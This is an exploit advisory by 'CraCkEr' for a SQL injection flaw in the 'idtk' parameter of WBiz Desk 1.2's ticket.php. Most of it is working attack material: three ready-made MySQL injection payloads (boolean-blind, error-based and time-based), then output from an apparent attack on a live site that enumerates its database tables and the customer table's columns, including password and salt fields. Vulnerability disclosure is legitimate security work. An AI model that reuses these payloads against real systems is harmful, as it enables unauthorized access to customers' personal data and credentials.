┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/5641/ │ │ Vendor : WeBiz Digital │ │ Software : WBiz Desk 1.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /ticket.php http://website/ticket.php?tk=1&idtk=[SQLi]&action=close GET parameter 'idtk' is vulnerable to SQL Injection --- Parameter: idtk (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close --- [+] Starting the Attack fetching current database current database: 'wbizdesk_*****_com_br' fetching tables [12 tables] +----------------+ | accounts | | category | | chat | | config | | customers | | departments | | email_template | | log_tb | | messages | | tickets | | tutorial | | users | +----------------+ fetching columns for table 'customers' [19 columns] +--------------+-------------------+ | Column | Type | +--------------+-------------------+ | name | varchar(160) | | number | varchar(11) | | status | enum('S','B','N') | | address | varchar(255) | | city | varchar(160) | | company | varchar(160) | | country | varchar(60) | | cpf_cnpj | varchar(60) | | email | varchar(255) | | id | int(11) | | ip | varchar(90) | | neighborhood | varchar(160) | | obs | text | | os | varchar(160) | | pass | varchar(160) | | phrase | varchar(160) | | salt | varchar(255) | | state | varchar(160) | | zipcode | varchar(60) | +--------------+-------------------+ [-] Done